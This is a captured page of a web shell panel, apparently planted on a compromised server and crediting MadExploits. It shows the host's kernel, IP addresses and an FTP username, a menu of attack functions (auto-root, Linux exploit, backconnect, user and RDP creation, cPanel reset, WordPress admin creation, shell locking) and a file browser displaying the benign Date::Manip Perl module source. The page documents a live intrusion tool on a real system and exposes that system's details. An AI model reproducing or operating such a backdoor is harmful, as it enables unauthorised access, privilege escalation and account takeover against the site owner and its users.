Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.213
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
vendor_perl /
Date /
[ HOME SHELL ]
Name
Size
Permission
Action
Language
[ DIR ]
drwxr-xr-x
Manip
[ DIR ]
drwxr-xr-x
Format.pm
9.42
KB
-rw-r--r--
Language.pm
2.6
KB
-rw-r--r--
Manip.pm
1.22
KB
-rw-r--r--
Manip.pod
7.41
KB
-rw-r--r--
Parse.pm
8.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Manip.pm
package Date::Manip; # Copyright (c) 2010-2017 Sullivan Beck. All rights reserved. # This program is free software; you can redistribute it and/or modify it # under the same terms as Perl itself. ########################################################################### ########################################################################### use warnings; use strict; use Exporter; our $VERSION; $VERSION='6.60'; our (@ISA,@EXPORT); my $backend; if ((exists $ENV{'DATE_MANIP'} && $ENV{'DATE_MANIP'} eq 'DM5') || (defined $Date::Manip::Backend && $Date::Manip::Backend eq 'DM5')) { $backend = 'Date::Manip::DM5'; } elsif ($] >= 5.010) { $backend = 'Date::Manip::DM6'; } else { $backend = 'Date::Manip::DM5'; } my $backend_exp = $backend . "::EXPORT"; my $flag = eval "require $backend; $backend->import(); return 'loaded';"; if (! $flag) { die "ERROR LOADING MODULE: $backend"; } { no strict 'refs'; @EXPORT = @{ $backend_exp }; } unshift (@ISA, $backend); 1; # Local Variables: # mode: cperl # indent-tabs-mode: nil # cperl-indent-level: 3 # cperl-continued-statement-offset: 2 # cperl-continued-brace-offset: 0 # cperl-brace-offset: 0 # cperl-brace-imaginary-offset: 0 # cperl-label-offset: 0 # End:
Close